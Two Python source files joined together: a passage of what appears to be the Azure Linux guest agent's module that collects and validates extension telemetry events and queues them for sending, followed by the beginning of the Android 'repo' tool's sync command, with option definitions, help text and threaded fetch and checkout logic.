"OperationId": "Guid (str)"
}
"""
Version = "Version"
Timestamp = "Timestamp"
TaskName = "TaskName"
EventLevel = "EventLevel"
Message = "Message"
EventPid = "EventPid"
EventTid = "EventTid"
OperationId = "OperationId"
class _ProcessExtensionEvents(PeriodicOperation):
"""
Periodic operation for collecting extension telemetry events and enqueueing them for the SendTelemetryHandler thread.
"""
_EXTENSION_EVENT_COLLECTION_PERIOD = datetime.timedelta(minutes=5)
_EXTENSION_EVENT_FILE_NAME_REGEX = re.compile(r"^(\d+)\.json$", re.IGNORECASE)
# Limits
_MAX_NUMBER_OF_EVENTS_PER_EXTENSION_PER_PERIOD = 300
_EXTENSION_EVENT_FILE_MAX_SIZE = 4 * 1024 * 1024 # 4 MB = 4 * 1,048,576 Bytes
_EXTENSION_EVENT_MAX_SIZE = 1024 * 6 # 6Kb or 6144 characters. Limit for the whole event. Prevent oversized events.
_EXTENSION_EVENT_MAX_MSG_LEN = 1024 * 3 # 3Kb or 3072 chars.
_EXTENSION_EVENT_REQUIRED_FIELDS = [attr.lower() for attr in dir(ExtensionEventSchema) if
not callable(getattr(ExtensionEventSchema, attr)) and not attr.startswith("__")]
def __init__(self, send_telemetry_events_handler):
super(_ProcessExtensionEvents, self).__init__(_ProcessExtensionEvents._EXTENSION_EVENT_COLLECTION_PERIOD)
self._send_telemetry_events_handler = send_telemetry_events_handler
def _operation(self):
if self._send_telemetry_events_handler.stopped():
logger.warn("{0} service is not running, skipping current iteration".format(
self._send_telemetry_events_handler.get_thread_name()))
return
delete_all_event_files = True
extension_handler_with_event_dirs = []
try:
extension_handler_with_event_dirs = self._get_extension_events_dir_with_handler_name(conf.get_ext_log_dir())
if not extension_handler_with_event_dirs:
logger.verbose("No extension events directories exist")
return
for extension_handler_with_event_dir in extension_handler_with_event_dirs:
handler_name = extension_handler_with_event_dir[0]
handler_event_dir_path = extension_handler_with_event_dir[1]
self._capture_extension_events(handler_name, handler_event_dir_path)
except ServiceStoppedError:
# Since the service stopped, we should not delete the extension event files;
# we'll retry sending them whenever the telemetry service comes back up
delete_all_event_files = False
except Exception as error:
msg = "Unknown error occurred when trying to collect extension events. Error: {0}, Stack: {1}".format(
ustr(error), traceback.format_exc())
add_event(op=WALAEventOperation.ExtensionTelemetryEventProcessing, message=msg, is_success=False)
finally:
# Always ensure that the events directories are emptied on each run (except when the Telemetry Service
# is stopped), even if we run into an error and don't process the events this run.
if delete_all_event_files:
self._ensure_all_events_directories_empty(extension_handler_with_event_dirs)
@staticmethod
def _get_extension_events_dir_with_handler_name(extension_log_dir):
"""
Get the full path to events directory for all extension handlers that have one
:param extension_log_dir: Base log directory for all extensions
:return: A list of full paths of existing events directory for all handlers
"""
extension_handler_with_event_dirs = []
for ext_handler_name in os.listdir(extension_log_dir):
# Check if it's an extension directory
if not os.path.isdir(os.path.join(extension_log_dir, ext_handler_name)) \
or re.match(HANDLER_NAME_PATTERN, ext_handler_name) is None:
continue
# Check if the EVENTS_DIRECTORY exists
extension_event_dir = os.path.join(extension_log_dir, ext_handler_name, EVENTS_DIRECTORY)
if os.path.exists(extension_event_dir):
extension_handler_with_event_dirs.append((ext_handler_name, extension_event_dir))
return extension_handler_with_event_dirs
def _event_file_size_allowed(self, event_file_path):
event_file_size = os.stat(event_file_path).st_size
if event_file_size > self._EXTENSION_EVENT_FILE_MAX_SIZE:
convert_to_mb = lambda x: (1.0 * x) / (1000 * 1000)
msg = "Skipping file: {0} as its size is {1:.2f} Mb > Max size allowed {2:.1f} Mb".format(
event_file_path, convert_to_mb(event_file_size),
convert_to_mb(self._EXTENSION_EVENT_FILE_MAX_SIZE))
logger.warn(msg)
add_log_event(level=logger.LogLevel.WARNING, message=msg, forced=True)
return False
return True
def _capture_extension_events(self, handler_name, handler_event_dir_path):
"""
Capture Extension events and add them to the events_list
:param handler_name: Complete Handler Name. Eg: Microsoft.CPlat.Core.RunCommandLinux
:param handler_event_dir_path: Full path. Eg: '/var/log/azure/Microsoft.CPlat.Core.RunCommandLinux/events'
"""
# Filter out the files that do not follow the pre-defined EXTENSION_EVENT_FILE_NAME_REGEX
event_files = [event_file for event_file in os.listdir(handler_event_dir_path) if
re.match(self._EXTENSION_EVENT_FILE_NAME_REGEX, event_file) is not None]
# Process the newest files first; older events are discarded once the per-period cap is reached
event_files.sort(reverse=True)
captured_extension_events_count = 0
dropped_events_with_error_count = defaultdict(int)
try:
for event_file in event_files:
event_file_path = os.path.join(handler_event_dir_path, event_file)
try:
logger.verbose("Processing event file: {0}", event_file_path)
if not self._event_file_size_allowed(event_file_path):
continue
# We support multiple events in a file, read the file and parse events.
captured_extension_events_count = self._enqueue_events_and_get_count(handler_name, event_file_path,
captured_extension_events_count,
dropped_events_with_error_count)
# We only allow MAX_NUMBER_OF_EVENTS_PER_EXTENSION_PER_PERIOD=300 maximum events per period per handler
if captured_extension_events_count >= self._MAX_NUMBER_OF_EVENTS_PER_EXTENSION_PER_PERIOD:
msg = "Reached max count for the extension: {0}; Max Limit: {1}. Skipping the rest.".format(
handler_name, self._MAX_NUMBER_OF_EVENTS_PER_EXTENSION_PER_PERIOD)
logger.warn(msg)
add_log_event(level=logger.LogLevel.WARNING, message=msg, forced=True)
break
except ServiceStoppedError:
# Not logging here as already logged once, re-raising
# Since we already started processing this file, deleting it as we could've already sent some events out
# This is a trade-off between duplicating data and losing data.
raise
except Exception as error:
msg = "Failed to process event file {0}: {1}, {2}".format(event_file, ustr(error),
traceback.format_exc())
logger.warn(msg)
add_log_event(level=logger.LogLevel.WARNING, message=msg, forced=True)
finally:
# Todo: We should delete files after ensuring that we sent the data to Wireserver successfully
# from our end rather than deleting first and sending later. This is to ensure the data reliability
# of the agent telemetry pipeline.
os.remove(event_file_path)
finally:
if dropped_events_with_error_count:
msg = "Dropped events for Extension: {0}; Details:\n\t{1}".format(handler_name, '\n\t'.join(
["Reason: {0}; Dropped Count: {1}".format(k, v) for k, v in dropped_events_with_error_count.items()]))
logger.warn(msg)
add_log_event(level=logger.LogLevel.WARNING, message=msg, forced=True)
if captured_extension_events_count > 0:
logger.info("Collected {0} events for extension: {1}".format(captured_extension_events_count, handler_name))
@staticmethod
def _ensure_all_events_directories_empty(extension_events_directories):
if not extension_events_directories:
return
for extension_handler_with_event_dir in extension_events_directories:
event_dir_path = extension_handler_with_event_dir[1]
if not os.path.exists(event_dir_path):
return
err = None
# Delete any residue files in the events directory
for residue_file in os.listdir(event_dir_path):
try:
os.remove(os.path.join(event_dir_path, residue_file))
except Exception as error:
# Only log the first error once per handler per run if unable to clean off residue files
err = ustr(error) if err is None else err
if err is not None:
logger.error("Failed to completely clear the {0} directory. Exception: {1}", event_dir_path, err)
def _enqueue_events_and_get_count(self, handler_name, event_file_path, captured_events_count,
dropped_events_with_error_count):
event_file_time = datetime.datetime.fromtimestamp(os.path.getmtime(event_file_path))
# Read event file and decode it properly
with open(event_file_path, "rb") as event_file_descriptor:
event_data = event_file_descriptor.read().decode("utf-8")
# Parse the string and get the list of events
events = json.loads(event_data)
# We allow multiple events in a file, but a file may also hold a single JSON event rather
# than a list; normalize to a list either way (a standalone sketch of this appears after the class).
if not isinstance(events, list):
events = [events]
for event in events:
try:
self._send_telemetry_events_handler.enqueue_event(
self._parse_telemetry_event(handler_name, event, event_file_time)
)
captured_events_count += 1
except InvalidExtensionEventError as invalid_error:
# These are the errors thrown if there's an error parsing the event. We want to report these back to the
# extension publishers so that they are aware of the issues.
# The error messages are all static, so we use them as dict keys and emit one event at the
# end of each run to report any errors hit while parsing events for the extension
dropped_events_with_error_count[ustr(invalid_error)] += 1
except ServiceStoppedError as stopped_error:
logger.error(
"Unable to enqueue events as service stopped: {0}. Stopping collecting extension events".format(
ustr(stopped_error)))
raise
except Exception as error:
logger.warn("Unable to parse and transmit event, error: {0}".format(error))
if captured_events_count >= self._MAX_NUMBER_OF_EVENTS_PER_EXTENSION_PER_PERIOD:
break
return captured_events_count
def _parse_telemetry_event(self, handler_name, extension_unparsed_event, event_file_time):
"""
Parse the Json event file and convert it to TelemetryEvent object with the required data.
:return: Complete TelemetryEvent with all required fields filled up properly. Raises if event breaches contract.
"""
extension_event = self._parse_event_and_ensure_it_is_valid(extension_unparsed_event)
# Create a telemetry event, add all common parameters to the event
# and then overwrite any common params that the extension event also provides
event = TelemetryEvent(TELEMETRY_LOG_EVENT_ID, TELEMETRY_LOG_PROVIDER_ID)
event.file_type = "json"
CollectTelemetryEventsHandler.add_common_params_to_telemetry_event(event, event_file_time)
replace_or_add_params = {
GuestAgentGenericLogsSchema.EventName: "{0}-{1}".format(handler_name, extension_event[
ExtensionEventSchema.Version.lower()]),
GuestAgentGenericLogsSchema.CapabilityUsed: extension_event[ExtensionEventSchema.EventLevel.lower()],
GuestAgentGenericLogsSchema.TaskName: extension_event[ExtensionEventSchema.TaskName.lower()],
GuestAgentGenericLogsSchema.Context1: extension_event[ExtensionEventSchema.Message.lower()],
GuestAgentGenericLogsSchema.Context2: extension_event[ExtensionEventSchema.Timestamp.lower()],
GuestAgentGenericLogsSchema.Context3: extension_event[ExtensionEventSchema.OperationId.lower()],
GuestAgentGenericLogsSchema.EventPid: extension_event[ExtensionEventSchema.EventPid.lower()],
GuestAgentGenericLogsSchema.EventTid: extension_event[ExtensionEventSchema.EventTid.lower()]
}
self._replace_or_add_param_in_event(event, replace_or_add_params)
return event
def _parse_event_and_ensure_it_is_valid(self, extension_event):
"""
Parse the Json event from file. Raise InvalidExtensionEventError if the event breaches pre-set contract.
:param extension_event: The json event from file
:return: Verified Json event that qualifies the contract.
"""
clean_string = lambda x: x.strip() if x is not None else x
event_size = 0
key_err_msg = "{0}: {1} not found"
# Convert the dict to all lower keys to avoid schema confusion.
# Only pick the params that we care about and skip the rest.
event = dict((k.lower(), clean_string(v)) for k, v in extension_event.items() if
k.lower() in self._EXTENSION_EVENT_REQUIRED_FIELDS)
# Trim message and only pick the first 3k chars
message_key = ExtensionEventSchema.Message.lower()
if message_key in event:
event[message_key] = event[message_key][:self._EXTENSION_EVENT_MAX_MSG_LEN]
else:
raise InvalidExtensionEventError(
key_err_msg.format(InvalidExtensionEventError.MissingKeyError, ExtensionEventSchema.Message))
if not event[message_key]:
raise InvalidExtensionEventError(
"{0}: {1} should not be empty".format(InvalidExtensionEventError.EmptyMessageError,
ExtensionEventSchema.Message))
for required_key in self._EXTENSION_EVENT_REQUIRED_FIELDS:
# Raise if any required key is missing from the event
if required_key not in event:
raise InvalidExtensionEventError(
key_err_msg.format(InvalidExtensionEventError.MissingKeyError, required_key))
# If the event_size > _EXTENSION_EVENT_MAX_SIZE=6k, then raise
if event_size > self._EXTENSION_EVENT_MAX_SIZE:
raise InvalidExtensionEventError(
"{0}: max event size allowed: {1}".format(InvalidExtensionEventError.OversizeEventError,
self._EXTENSION_EVENT_MAX_SIZE))
event_size += len(event[required_key])
return event
@staticmethod
def _replace_or_add_param_in_event(event, replace_or_add_params):
for param in event.parameters:
if param.name in replace_or_add_params:
param.value = replace_or_add_params.pop(param.name)
if not replace_or_add_params:
# All values replaced, return
return
# Add the remaining params to the event
for param_name in replace_or_add_params:
event.parameters.append(TelemetryEventParam(param_name, replace_or_add_params[param_name]))
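# Illustrative sketch (not part of the agent): the single-event-or-list
# normalization that _enqueue_events_and_get_count applies to raw file contents,
# shown as a standalone helper. The helper name is made up and nothing calls it.
def _example_load_extension_events(event_data):
    """Return a list of event dicts whether the file held one event or many."""
    events = json.loads(event_data)
    if not isinstance(events, list):
        events = [events]
    return events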
class _CollectAndEnqueueEvents(PeriodicOperation):
"""
Periodic operation to collect telemetry events located in the events folder and enqueue them for the
SendTelemetryHandler thread.
"""
_EVENT_COLLECTION_PERIOD = datetime.timedelta(minutes=1)
def __init__(self, send_telemetry_events_handler):
super(_CollectAndEnqueueEvents, self).__init__(_CollectAndEnqueueEvents._EVENT_COLLECTION_PERIOD)
self._send_telemetry_events_handler = send_telemetry_events_handler
def _operation(self):
"""
Periodically send any events located in the events folder
"""
try:
if self._send_telemetry_events_handler.stopped():
logger.warn("{0} service is not running, skipping iteration.".format(
self._send_telemetry_events_handler.get_thread_name()))
return
self.process_events()
except Exception as error:
err_msg = "Failure in collecting telemetry events: {0}".format(ustr(error))
add_event(op=WALAEventOperation.UnhandledError, message=err_msg, is_success=False)
def process_events(self):
"""
Enqueue the events located in the events directory for the telemetry pipeline and delete the
corresponding files.
"""
event_directory_full_path = os.path.join(conf.get_lib_dir(), EVENTS_DIRECTORY)
event_files = os.listdir(event_directory_full_path)
debug_info = CollectOrReportEventDebugInfo(operation=CollectOrReportEventDebugInfo.OP_COLLECT)
for event_file in event_files:
try:
match = EVENT_FILE_REGEX.search(event_file)
if match is None:
continue
event_file_path = os.path.join(event_directory_full_path, event_file)
try:
logger.verbose("Processing event file: {0}", event_file_path)
with open(event_file_path, "rb") as event_fd:
event_data = event_fd.read().decode("utf-8")
event = parse_event(event_data)
# "legacy" events are events produced by previous versions of the agent (<= 2.2.46) and extensions;
# they do not include all the telemetry fields, so we add them here
is_legacy_event = match.group('agent_event') is None
if is_legacy_event:
# We'll use the file creation time for the event's timestamp
event_file_creation_time_epoch = os.path.getmtime(event_file_path)
event_file_creation_time = datetime.datetime.fromtimestamp(event_file_creation_time_epoch)
if event.is_extension_event():
_CollectAndEnqueueEvents._trim_legacy_extension_event_parameters(event)
CollectTelemetryEventsHandler.add_common_params_to_telemetry_event(event,
event_file_creation_time)
else:
_CollectAndEnqueueEvents._update_legacy_agent_event(event,
event_file_creation_time)
self._send_telemetry_events_handler.enqueue_event(event)
finally:
# Todo: We should delete files after ensuring that we sent the data to Wireserver successfully
# from our end rather than deleting first and sending later. This is to ensure the data reliability
# of the agent telemetry pipeline.
os.remove(event_file_path)
except ServiceStoppedError as stopped_error:
logger.error(
"Unable to enqueue events as service stopped: {0}, skipping events collection".format(
ustr(stopped_error)))
except UnicodeError as uni_err:
debug_info.update_unicode_error(uni_err)
except Exception as error:
debug_info.update_op_error(error)
debug_info.report_debug_info()
@staticmethod
def _update_legacy_agent_event(event, event_creation_time):
# Ensure that if an agent event is missing a field from the schema defined since 2.2.47, the missing fields
# will be appended, ensuring the event schema is complete before the event is reported.
new_event = TelemetryEvent()
new_event.parameters = []
CollectTelemetryEventsHandler.add_common_params_to_telemetry_event(new_event, event_creation_time)
event_params = dict([(param.name, param.value) for param in event.parameters])
new_event_params = dict([(param.name, param.value) for param in new_event.parameters])
missing_params = set(new_event_params.keys()).difference(set(event_params.keys()))
params_to_add = []
for param_name in missing_params:
params_to_add.append(TelemetryEventParam(param_name, new_event_params[param_name]))
event.parameters.extend(params_to_add)
@staticmethod
def _trim_legacy_extension_event_parameters(event):
"""
This method is called for extension events before they are sent out. Per the agreement with extension
publishers, the parameters that belong to extensions and will be reported intact are Name, Version, Operation,
OperationSuccess, Message, and Duration. Since there is nothing preventing extensions from populating other
fields (which belong to the agent), we call this method to ensure the rest of the parameters are trimmed since
they will be replaced with values coming from the agent.
:param event: Extension event to trim.
:return: Trimmed extension event; containing only extension-specific parameters.
"""
params_to_keep = dict().fromkeys([
GuestAgentExtensionEventsSchema.Name,
GuestAgentExtensionEventsSchema.Version,
GuestAgentExtensionEventsSchema.Operation,
GuestAgentExtensionEventsSchema.OperationSuccess,
GuestAgentExtensionEventsSchema.Message,
GuestAgentExtensionEventsSchema.Duration
])
trimmed_params = []
for param in event.parameters:
if param.name in params_to_keep:
trimmed_params.append(param)
event.parameters = trimmed_params
class CollectTelemetryEventsHandler(ThreadHandlerInterface):
"""
This Handler takes care of fetching the Extension Telemetry events from the {extension_events_dir} and sends them to
Kusto for advanced debuggability.
"""
_THREAD_NAME = "TelemetryEventsCollector"
def __init__(self, send_telemetry_events_handler):
self.should_run = True
self.thread = None
self._send_telemetry_events_handler = send_telemetry_events_handler
@staticmethod
def get_thread_name():
return CollectTelemetryEventsHandler._THREAD_NAME
def run(self):
logger.info("Start Extension Telemetry service.")
self.start()
def is_alive(self):
return self.thread is not None and self.thread.is_alive()
def start(self):
self.thread = threading.Thread(target=self.daemon)
self.thread.setDaemon(True)
self.thread.setName(CollectTelemetryEventsHandler.get_thread_name())
self.thread.start()
def stop(self):
"""
Stop server communication and join the thread to main thread.
"""
self.should_run = False
if self.is_alive():
self.thread.join()
def stopped(self):
return not self.should_run
def daemon(self):
periodic_operations = [
_CollectAndEnqueueEvents(self._send_telemetry_events_handler)
]
is_etp_enabled = get_supported_feature_by_name(SupportedFeatureNames.ExtensionTelemetryPipeline).is_supported
logger.info("Extension Telemetry pipeline enabled: {0}".format(is_etp_enabled))
if is_etp_enabled:
periodic_operations.append(_ProcessExtensionEvents(self._send_telemetry_events_handler))
logger.info("Successfully started the {0} thread".format(self.get_thread_name()))
while not self.stopped():
try:
for periodic_op in periodic_operations:
periodic_op.run()
except Exception as error:
logger.warn(
"An error occurred in the Telemetry Extension thread main loop; will skip the current iteration.\n{0}",
ustr(error))
finally:
PeriodicOperation.sleep_until_next_operation(periodic_operations)
@staticmethod
def add_common_params_to_telemetry_event(event, event_time):
reporter = get_event_logger()
reporter.add_common_event_parameters(event, event_time)
|
sync.py
|
# -*- coding:utf-8 -*-
#
# Copyright (C) 2008 The Android Open Source Project
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import print_function
import json
import netrc
from optparse import SUPPRESS_HELP
import os
import re
import socket
import subprocess
import sys
import tempfile
import time
from pyversion import is_python3
if is_python3():
import http.cookiejar as cookielib
import urllib.error
import urllib.parse
import urllib.request
import xmlrpc.client
else:
import cookielib
import imp
import urllib2
import urlparse
import xmlrpclib
urllib = imp.new_module('urllib')
urllib.error = urllib2
urllib.parse = urlparse
urllib.request = urllib2
xmlrpc = imp.new_module('xmlrpc')
xmlrpc.client = xmlrpclib
try:
import threading as _threading
except ImportError:
import dummy_threading as _threading
try:
import resource
def _rlimit_nofile():
return resource.getrlimit(resource.RLIMIT_NOFILE)
except ImportError:
def _rlimit_nofile():
return (256, 256)
try:
import multiprocessing
except ImportError:
multiprocessing = None
import event_log
from git_command import GIT, git_require
from git_config import GetUrlCookieFile
from git_refs import R_HEADS, HEAD
import gitc_utils
from project import Project
from project import RemoteSpec
from command import Command, MirrorSafeCommand
from error import RepoChangedException, GitError, ManifestParseError
import platform_utils
from project import SyncBuffer
from progress import Progress
from wrapper import Wrapper
from manifest_xml import GitcManifest
_ONE_DAY_S = 24 * 60 * 60
class _FetchError(Exception):
"""Internal error thrown in _FetchHelper() when we don't want stack trace."""
pass
class _CheckoutError(Exception):
"""Internal error thrown in _CheckoutOne() when we don't want stack trace."""
class Sync(Command, MirrorSafeCommand):
jobs = 1
common = True
helpSummary = "Update working tree to the latest revision"
helpUsage = """
%prog [<project>...]
"""
helpDescription = """
The '%prog' command synchronizes local project directories
with the remote repositories specified in the manifest. If a local
project does not yet exist, it will clone a new local directory from
the remote repository and set up tracking branches as specified in
the manifest. If the local project already exists, '%prog'
will update the remote branches and rebase any new local changes
on top of the new remote changes.
'%prog' will synchronize all projects listed at the command
line. Projects can be specified either by name, or by a relative
or absolute path to the project's local directory. If no projects
are specified, '%prog' will synchronize all projects listed in
the manifest.
The -d/--detach option can be used to switch specified projects
back to the manifest revision. This option is especially helpful
if the project is currently on a topic branch, but the manifest
revision is temporarily needed.
The -s/--smart-sync option can be used to sync to a known good
build as specified by the manifest-server element in the current
manifest. The -t/--smart-tag option is similar and allows you to
specify a custom tag/label.
The -u/--manifest-server-username and -p/--manifest-server-password
options can be used to specify a username and password to authenticate
with the manifest server when using the -s or -t option.
If -u and -p are not specified when using the -s or -t option, '%prog'
will attempt to read authentication credentials for the manifest server
from the user's .netrc file.
'%prog' will not use authentication credentials from -u/-p or .netrc
if the manifest server specified in the manifest file already includes
credentials.
By default, all projects will be synced. The --fail-fast option can be used
to halt syncing as soon as possible when the first project fails to sync.
The --force-sync option can be used to overwrite existing git
directories if they have previously been linked to a different
object directory. WARNING: This may cause data to be lost since
refs may be removed when overwriting.
The --force-remove-dirty option can be used to remove previously used
projects with uncommitted changes. WARNING: This may cause data to be
lost since uncommitted changes may be removed with projects that no longer
exist in the manifest.
The --no-clone-bundle option disables any attempt to use
$URL/clone.bundle to bootstrap a new Git repository from a
resumable bundle file on a content delivery network. This
may be necessary if there are problems with the local Python
HTTP client or proxy configuration, but the Git binary works.
The --fetch-submodules option enables fetching Git submodules
of a project from the server.
The -c/--current-branch option can be used to only fetch objects that
are on the branch specified by a project's revision.
The --optimized-fetch option can be used to only fetch projects that
are fixed to a sha1 revision if the sha1 revision does not already
exist locally.
The --prune option can be used to remove any refs that no longer
exist on the remote.
# SSH Connections
If at least one project remote URL uses an SSH connection (ssh://,
git+ssh://, or user@host:path syntax) repo will automatically
enable the SSH ControlMaster option when connecting to that host.
This feature permits other projects in the same '%prog' session to
reuse the same SSH tunnel, saving connection setup overheads.
To disable this behavior on UNIX platforms, set the GIT_SSH
environment variable to 'ssh'. For example:
export GIT_SSH=ssh
%prog
# Compatibility
This feature is automatically disabled on Windows, due to the lack
of UNIX domain socket support.
This feature is not compatible with url.insteadof rewrites in the
user's ~/.gitconfig. '%prog' is currently not able to perform the
rewrite early enough to establish the ControlMaster tunnel.
If the remote SSH daemon is Gerrit Code Review, version 2.0.10 or
later is required to fix a server side protocol bug.
"""
def _Options(self, p, show_smart=True):
try:
self.jobs = self.manifest.default.sync_j
except ManifestParseError:
self.jobs = 1
p.add_option('-f', '--force-broken',
dest='force_broken', action='store_true',
help='obsolete option (to be deleted in the future)')
p.add_option('--fail-fast',
dest='fail_fast', action='store_true',
help='stop syncing after first error is hit')
p.add_option('--force-sync',
dest='force_sync', action='store_true',
help="overwrite an existing git directory if it needs to "
"point to a different object directory. WARNING: this "
"may cause loss of data")
p.add_option('--force-remove-dirty',
dest='force_remove_dirty', action='store_true',
help="force remove projects with uncommitted modifications if "
"projects no longer exist in the manifest. "
"WARNING: this may cause loss of data")
p.add_option('-l', '--local-only',
dest='local_only', action='store_true',
help="only update working tree, don't fetch")
p.add_option('-n', '--network-only',
dest='network_only', action='store_true',
help="fetch only, don't update working tree")
p.add_option('-d', '--detach',
dest='detach_head', action='store_true',
help='detach projects back to manifest revision')
p.add_option('-c', '--current-branch',
dest='current_branch_only', action='store_true',
help='fetch only current branch from server')
p.add_option('-q', '--quiet',
dest='quiet', action='store_true',
help='be more quiet')
p.add_option('-j', '--jobs',
dest='jobs', action='store', type='int',
help="projects to fetch simultaneously (default %d)" % self.jobs)
p.add_option('-m', '--manifest-name',
dest='manifest_name',
help='temporary manifest to use for this sync', metavar='NAME.xml')
p.add_option('--no-clone-bundle',
dest='no_clone_bundle', action='store_true',
help='disable use of /clone.bundle on HTTP/HTTPS')
p.add_option('-u', '--manifest-server-username', action='store',
dest='manifest_server_username',
help='username to authenticate with the manifest server')
p.add_option('-p', '--manifest-server-password', action='store',
dest='manifest_server_password',
help='password to authenticate with the manifest server')
p.add_option('--fetch-submodules',
dest='fetch_submodules', action='store_true',
help='fetch submodules from server')
p.add_option('--no-tags',
dest='no_tags', action='store_true',
help="don't fetch tags")
p.add_option('--optimized-fetch',
dest='optimized_fetch', action='store_true',
help='only fetch projects fixed to sha1 if revision does not exist locally')
p.add_option('--prune', dest='prune', action='store_true',
help='delete refs that no longer exist on the remote')
if show_smart:
p.add_option('-s', '--smart-sync',
dest='smart_sync', action='store_true',
help='smart sync using manifest from the latest known good build')
p.add_option('-t', '--smart-tag',
dest='smart_tag', action='store',
help='smart sync using manifest from a known tag')
g = p.add_option_group('repo Version options')
g.add_option('--no-repo-verify',
dest='no_repo_verify', action='store_true',
help='do not verify repo source code')
g.add_option('--repo-upgraded',
dest='repo_upgraded', action='store_true',
help=SUPPRESS_HELP)
def _FetchProjectList(self, opt, projects, sem, *args, **kwargs):
"""Main function of the fetch threads.
Delegates most of the work to _FetchHelper.
Args:
opt: Program options returned from optparse. See _Options().
projects: Projects to fetch.
sem: We'll release() this semaphore when we exit so that another thread
can be started up.
*args, **kwargs: Remaining arguments to pass to _FetchHelper. See the
_FetchHelper docstring for details.
"""
try:
for project in projects:
success = self._FetchHelper(opt, project, *args, **kwargs)
if not success and opt.fail_fast:
break
finally:
sem.release()
def _FetchHelper(self, opt, project, lock, fetched, pm, err_event,
clone_filter):
"""Fetch git objects for a single project.
Args:
opt: Program options returned from optparse. See _Options().
project: Project object for the project to fetch.
lock: Lock for accessing objects that are shared amongst multiple
_FetchHelper() threads.
fetched: set object that we will add project.gitdir to when we're done
(with our lock held).
pm: Instance of a Progress object. We will call pm.update() (with our
lock held).
err_event: We'll set this event in the case of an error (after printing
out info about the error).
clone_filter: Filter for use in a partial clone.
Returns:
Whether the fetch was successful.
"""
# We'll set to true once we've locked the lock.
did_lock = False
if not opt.quiet:
print('Fetching project %s' % project.name)
# Encapsulate everything in a try/except/finally so that:
# - We always set err_event in the case of an exception.
# - We always make sure we unlock the lock if we locked it.
start = time.time()
success = False
try:
try:
success = project.Sync_NetworkHalf(
quiet=opt.quiet,
current_branch_only=opt.current_branch_only,
force_sync=opt.force_sync,
clone_bundle=not opt.no_clone_bundle,
no_tags=opt.no_tags, archive=self.manifest.IsArchive,
optimized_fetch=opt.optimized_fetch,
prune=opt.prune,
clone_filter=clone_filter)
self._fetch_times.Set(project, time.time() - start)
# Lock around all the rest of the code, since printing, updating a set
# and Progress.update() are not thread safe.
lock.acquire()
did_lock = True
if not success:
err_event.set()
print('error: Cannot fetch %s from %s'
% (project.name, project.remote.url),
file=sys.stderr)
if opt.fail_fast:
raise _FetchError()
fetched.add(project.gitdir)
pm.update()
except _FetchError:
pass
except Exception as e:
print('error: Cannot fetch %s (%s: %s)' \
% (project.name, type(e).__name__, str(e)), file=sys.stderr)
err_event.set()
raise
finally:
if did_lock:
lock.release()
finish = time.time()
self.event_log.AddSync(project, event_log.TASK_SYNC_NETWORK,
start, finish, success)
return success
def _Fetch(self, projects, opt):
fetched = set()
lock = _threading.Lock()
pm = Progress('Fetching projects', len(projects),
print_newline=not(opt.quiet),
always_print_percentage=opt.quiet)
objdir_project_map = dict()
for project in projects:
objdir_project_map.setdefault(project.objdir, []).append(project)
threads = set()
sem = _threading.Semaphore(self.jobs)
err_event = _threading.Event()
for project_list in objdir_project_map.values():
# Check for any errors before running any more tasks.
# ...we'll let existing threads finish, though.
if err_event.isSet() and opt.fail_fast:
break
sem.acquire()
kwargs = dict(opt=opt,
projects=project_list,
sem=sem,
lock=lock,
fetched=fetched,
pm=pm,
err_event=err_event,
clone_filter=self.manifest.CloneFilter)
if self.jobs > 1:
t = _threading.Thread(target = self._FetchProjectList,
kwargs = kwargs)
# Ensure that Ctrl-C will not freeze the repo process.
t.daemon = True
threads.add(t)
t.start()
else:
self._FetchProjectList(**kwargs)
for t in threads:
t.join()
# If we saw an error, exit with code 1 so that other scripts can check.
if err_event.isSet() and opt.fail_fast:
print('\nerror: Exited sync due to fetch errors', file=sys.stderr)
sys.exit(1)
pm.end()
self._fetch_times.Save()
if not self.manifest.IsArchive:
self._GCProjects(projects)
return fetched
def _CheckoutWorker(self, opt, sem, project, *args, **kwargs):
"""Main function of the checkout threads.
Delegates most of the work to _CheckoutOne.
Args:
opt: Program options returned from optparse. See _Options().
project: Project to check out.
sem: We'll release() this semaphore when we exit so that another thread
can be started up.
*args, **kwargs: Remaining arguments to pass to _CheckoutOne. See the
_CheckoutOne docstring for details.
"""
try:
return self._CheckoutOne(opt, project, *args, **kwargs)
finally:
sem.release()
def _CheckoutOne(self, opt, project, lock, pm, err_event):
"""Checkout work tree for one project
Args:
opt: Program options returned from optparse. See _Options().
project: Project object for the project to checkout.
lock: Lock for accessing objects that are shared amongst multiple
_CheckoutWorker() threads.
pm: Instance of a Progress object. We will call pm.update() (with our
lock held).
err_event: We'll set this event in the case of an error (after printing
out info about the error).
Returns:
Whether the checkout was successful.
"""
# We'll set to true once we've locked the lock.
did_lock = False
if not opt.quiet:
print('Checking out project %s' % project.name)
# Encapsulate everything in a try/except/finally so that:
# - We always set err_event in the case of an exception.
# - We always make sure we unlock the lock if we locked it.
start = time.time()
syncbuf = SyncBuffer(self.manifest.manifestProject.config,
detach_head=opt.detach_head)
success = False
try:
try:
project.Sync_LocalHalf(syncbuf, force_sync=opt.force_sync)
success = syncbuf.Finish()
# Lock around all the rest of the code, since printing, updating a set
# and Progress.update() are not thread safe.
lock.acquire()
did_lock = True
if not success:
err_event.set()
print('error: Cannot checkout %s' % (project.name),
file=sys.stderr)
raise _CheckoutError()
pm.update()
except _CheckoutError:
pass
except Exception as e:
print('error: Cannot checkout %s: %s: %s' %
(project.name, type(e).__name__, str(e)),
file=sys.stderr)
err_event.set()
raise
finally:
if did_lock:
lock.release()
finish = time.time()
self.event_log.AddSync(project, event_log.TASK_SYNC_LOCAL,
start, finish, success)
return success
def _Checkout(self, all_projects, opt):
"""Checkout projects listed in all_projects
Args:
all_projects: List of all projects that should be checked out.
opt: Program options returned from optparse. See _Options().
"""
# Perform checkouts in multiple threads when we are using partial clone.
# Without partial clone, all needed git objects are already downloaded,
# in this situation it's better to use only one process because the checkout
# would be mostly disk I/O; with partial clone, the objects are only
# downloaded when demanded (at checkout time), which is similar to the
# Sync_NetworkHalf case and parallelism would be helpful.
if self.manifest.CloneFilter:
syncjobs = self.jobs
else:
syncjobs = 1
lock = _threading.Lock()
pm = Progress('Syncing work tree', len(all_projects))
threads = set()
sem = _threading.Semaphore(syncjobs)
